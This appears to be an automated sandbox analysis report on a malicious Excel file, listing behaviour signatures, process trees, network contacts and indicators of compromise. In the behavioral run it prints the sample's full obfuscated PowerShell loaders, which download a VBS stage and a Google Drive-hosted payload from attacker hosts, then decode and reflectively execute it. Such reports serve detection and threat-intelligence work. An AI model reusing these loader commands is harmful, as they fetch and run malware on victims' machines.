Malware Analysis Report

2025-08-05 11:48

Sample ID 241031-eh7mzazcrl
Target dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1.xls
SHA256 dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1
Tags
defense_evasion discovery execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1

Threat Level: Known bad

The file dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1.xls was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution

Process spawned unexpected child process

Evasion via Device Credential Deployment

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Uses Volume Shadow Copy WMI provider

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-31 03:59

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-31 03:57

Reported

2024-10-31 04:03

Platform

win10v2004-20241007-en

Max time kernel

143s

Max time network

152s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1124 wrote to memory of 4684 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 1124 wrote to memory of 4684 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 102.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 acesso.run udp
US 104.21.74.191:443 acesso.run tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp
US 198.46.178.151:80 198.46.178.151 tcp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 191.74.21.104.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 151.178.46.198.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 69.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/1124-0-0x00007FF875C10000-0x00007FF875C20000-memory.dmp

memory/1124-3-0x00007FF8B5C2D000-0x00007FF8B5C2E000-memory.dmp

memory/1124-4-0x00007FF875C10000-0x00007FF875C20000-memory.dmp

memory/1124-5-0x00007FF875C10000-0x00007FF875C20000-memory.dmp

memory/1124-2-0x00007FF875C10000-0x00007FF875C20000-memory.dmp

memory/1124-1-0x00007FF875C10000-0x00007FF875C20000-memory.dmp

memory/1124-9-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

memory/1124-8-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

memory/1124-7-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

memory/1124-6-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

memory/1124-11-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

memory/1124-12-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

memory/1124-13-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

memory/1124-14-0x00007FF8732B0000-0x00007FF8732C0000-memory.dmp

memory/1124-15-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

memory/1124-10-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

memory/1124-16-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

memory/1124-17-0x00007FF8732B0000-0x00007FF8732C0000-memory.dmp

memory/1124-18-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

memory/1124-21-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

memory/1124-20-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

memory/1124-19-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

memory/4684-39-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

memory/1124-45-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

memory/4684-49-0x00007FF8B5B90000-0x00007FF8B5D85000-memory.dmp

memory/4684-50-0x00007FF772030000-0x00007FF772038000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 c386a4aeddf5542940414e51d5ece19b
SHA1 7aa4d73f562babd3a961a96d85c91b665f8201a0
SHA256 ae7ea7dda9e19012cfc58ff846522a03f13ea9c56a0761809ae09f4c850430f7
SHA512 2b88a5f1c67bfbe34c4aa16488eef91555be4274b4c5c70641be9b2b424d1483922beeea4040154ddd3452147de6928ef04063a03798a5d0442319adc2e92144

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-31 03:57

Reported

2024-10-31 04:03

Platform

win7-20240903-en

Max time kernel

119s

Max time network

122s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1.xls

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1404 wrote to memory of 2896 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE
PID 1404 wrote to memory of 2896 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE
PID 1404 wrote to memory of 2896 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE
PID 1404 wrote to memory of 2896 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE
PID 2896 wrote to memory of 2404 N/A C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2896 wrote to memory of 2404 N/A C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2896 wrote to memory of 2404 N/A C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2896 wrote to memory of 2404 N/A C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2896 wrote to memory of 1888 N/A C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2896 wrote to memory of 1888 N/A C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2896 wrote to memory of 1888 N/A C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2896 wrote to memory of 1888 N/A C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1888 wrote to memory of 692 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1888 wrote to memory of 692 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1888 wrote to memory of 692 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1888 wrote to memory of 692 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2896 wrote to memory of 1848 N/A C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE C:\Windows\SysWOW64\WScript.exe
PID 2896 wrote to memory of 1848 N/A C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE C:\Windows\SysWOW64\WScript.exe
PID 2896 wrote to memory of 1848 N/A C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE C:\Windows\SysWOW64\WScript.exe
PID 2896 wrote to memory of 1848 N/A C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE C:\Windows\SysWOW64\WScript.exe
PID 1848 wrote to memory of 2904 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1848 wrote to memory of 2904 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1848 wrote to memory of 2904 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1848 wrote to memory of 2904 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2904 wrote to memory of 2304 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2904 wrote to memory of 2304 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2904 wrote to memory of 2304 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2904 wrote to memory of 2304 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\dc8cc8622001466d8dd715db5cfd1c7e930f1c201fd1a37106f5191ae68a33e1.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE

"C:\Windows\sYsteM32\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE" "pOweRshell -Ex bYPAss -noP -w 1 -c deVICEcREdEnTiaLDEPlOYmENt.eXe ; IeX($(iEX('[sYsTem.teXt.ENcoding]'+[ChAR]0X3A+[ChAR]0X3A+'utF8.geTstRInG([sYsTeM.CoNVeRt]'+[CHaR]0X3A+[char]0x3a+'fRoMBase64sTrinG('+[ChAR]0X22+'JEhReHJKU2ZXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlUkRFRkluaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHl2Q2FjT3NiUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxVEN2dHJKVElJcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHdUc0dkTE0sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXdMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAib1V1WXR5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpRFFLc1Z2b0pUUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkSFF4ckpTZlc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82NS9zZWV0aGViZXN0aHRpbmdzd2l0aG1ld2hpY2hnaXZlZ3JlYXRvdXRwdXRvZm1lZ29vZC50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdGh0aW5nc3dpdGhtZXdoaWNoZ2l2ZWdyZWF0b3V0cHV0b2ZtLnZiUyIsMCwwKTtTdGFSdC1TbGVFcCgzKTtzdEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdGh0aW5nc3dpdGhtZXdoaWNoZ2l2ZWdyZWF0b3V0cHV0b2ZtLnZiUyI='+[cHar]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -noP -w 1 -c deVICEcREdEnTiaLDEPlOYmENt.eXe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hhes_v5z.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF845.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF844.tmp"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vbS"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRTaEVMTElkWzFdKyRzaGVsTElkWzEzXSsneCcpICgoJ1M3RmltYWdlJysnVXJsID0gYkJIaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgYkJIO1M3RndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbicrJ3Q7UzdGaW1hZ2VCeXRlcyA9IFM3RndlYkNsaWVudC5Eb3dubG9hZERhJysndGEoUzdGaW1hJysnZ2VVcmwpO1M3RmltYWdlVGV4dCA9JysnIFtTeXN0ZW0uVGUnKyd4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nJysnKFM3RmltYWdlQnl0ZXMpO1M3RnN0YXJ0RmxhZyA9IGJCSDw8JysnQkFTRTY0XycrJ1NUQVJUPj5iQkg7UzdGZW5kRmxhZyA9IGInKydCSDw8QkFTRTY0X0VORD4+YkJIO1M3RnN0YXJ0SW5kZXggPSBTN0ZpbWFnZVRleHQuSW5kZXhPZihTN0ZzdGFydEZsYWcpO1M3RmVuZEluZGV4JysnID0gUzdGaW1hZ2VUZXh0LkluZGV4T2YoUzdGZW5kRmxhJysnZyk7UzdGc3RhcnRJbmRleCAtZ2UgJysnMCAtYW5kIFM3RmVuZEluZGV4IC1ndCBTN0ZzdCcrJ2FydEluZGV4O1M3RnN0YXJ0SW5kZXggKz0gUzdGJysnc3RhcnRGbGFnLkxlbmcnKyd0aDtTN0ZiYScrJ3NlNjRMZW5ndGggPSBTN0ZlbmRJbmRleCAtIFM3RnN0YXInKyd0SW5kZXg7UzdGYmFzZTY0Q29tbWFuZCA9IFM3RmltYWdlVGV4dC5TdWJzdHJpbmcoUzdGc3RhcnRJbmRleCwgUzdGYmFzZTY0TCcrJ2VuZ3RoKTsnKydTN0ZiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luICcrJyhTN0ZiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgQkRGIEZvckVhY2gtT2JqZWN0IHsgUzdGXyB9KVsnKyctJysnMS4nKycuLShTN0ZiYXNlNjRDb21tYW5kLkxlbmd0aCldO1M3RmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoUzdGYicrJ2FzZTY0UmV2ZXJzZWQpO1M3RmxvYWRlZEFzJysnc2VtJysnYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChTN0Zjb21tYScrJ25kJysnQnl0JysnZXMpO1M3RnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QoYkJIVkFJJysnYkJIKTtTN0Z2YWlNZXRob2QuSW52b2tlKFM3Rm51JysnbGwsIEAoYkJIdHh0LktMTExQTVMvNTYvMTUxLjg3MS42NC44OTEvLzpwdHRoYkJILCBiQkhkZXNhdGl2YWRvYkJILCBiQkhkZXNhdGl2YWRvYkInKydILCBiQkhkZXNhdGl2YWRvYkJILCBiQkhhc3BuZXRfcmVnYnJvd3NlcnNiQkgsIGJCSGRlc2F0aXZhZG9iQkgsIGJCSGRlc2F0aXZhZG9iQkgsYkJIZGVzYXRpdmFkb2JCSCxiQkhkZXNhdGl2YWRvJysnYkJILGJCSGRlc2F0aXZhZG8nKydiQkgsYkJIZGUnKydzYXRpdmFkb2JCSCxiQkhkZXNhdGl2YWRvYkJILGJCSDFiQkgsYkJIZGVzYXRpdmFkb2JCSCkpOycpLlJlUGxhY0UoJ0JERicsJ3wnKS5SZVBsYWNFKCdiQkgnLFtzdFJpbmddW2NoYXJdMzkpLlJlUGxhY0UoJ1M3RicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ShELLId[1]+$shelLId[13]+'x') (('S7Fimage'+'Url = bBHhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur bBH;S7FwebClient = New-Object System.Net.WebClien'+'t;S7FimageBytes = S7FwebClient.DownloadDa'+'ta(S7Fima'+'geUrl);S7FimageText ='+' [System.Te'+'xt.Encoding]::UTF8.GetString'+'(S7FimageBytes);S7FstartFlag = bBH<<'+'BASE64_'+'START>>bBH;S7FendFlag = b'+'BH<<BASE64_END>>bBH;S7FstartIndex = S7FimageText.IndexOf(S7FstartFlag);S7FendIndex'+' = S7FimageText.IndexOf(S7FendFla'+'g);S7FstartIndex -ge '+'0 -and S7FendIndex -gt S7Fst'+'artIndex;S7FstartIndex += S7F'+'startFlag.Leng'+'th;S7Fba'+'se64Length = S7FendIndex - S7Fstar'+'tIndex;S7Fbase64Command = S7FimageText.Substring(S7FstartIndex, S7Fbase64L'+'ength);'+'S7Fbase64Reversed = -jo'+'in '+'(S7Fbase64Command.ToCharArray() BDF ForEach-Object { S7F_ })['+'-'+'1.'+'.-(S7Fbase64Command.Length)];S7FcommandBytes = [System.Convert]::FromBase64String(S7Fb'+'ase64Reversed);S7FloadedAs'+'sem'+'bly = [System.Reflection.Assembly]::Load(S7Fcomma'+'nd'+'Byt'+'es);S7FvaiMethod = [dnlib.IO.Home]'+'.GetMethod(bBHVAI'+'bBH);S7FvaiMethod.Invoke(S7Fnu'+'ll, @(bBHtxt.KLLLPMS/56/151.871.64.891//:ptthbBH, bBHdesativadobBH, bBHdesativadobB'+'H, bBHdesativadobBH, bBHaspnet_regbrowsersbBH, bBHdesativadobBH, bBHdesativadobBH,bBHdesativadobBH,bBHdesativado'+'bBH,bBHdesativado'+'bBH,bBHde'+'sativadobBH,bBHdesativadobBH,bBH1bBH,bBHdesativadobBH));').RePlacE('BDF','|').RePlacE('bBH',[stRing][char]39).RePlacE('S7F','$'))"

Network

Country Destination Domain Proto
US 8.8.8.8:53 acesso.run udp
US 104.21.74.191:443 acesso.run tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp
US 198.46.178.151:80 198.46.178.151 tcp
US 104.21.74.191:443 acesso.run tcp
US 198.46.178.151:80 198.46.178.151 tcp
US 198.46.178.151:80 198.46.178.151 tcp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.187.193:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.80:80 crl.microsoft.com tcp

Files

memory/2688-1-0x000000007276D000-0x0000000072778000-memory.dmp

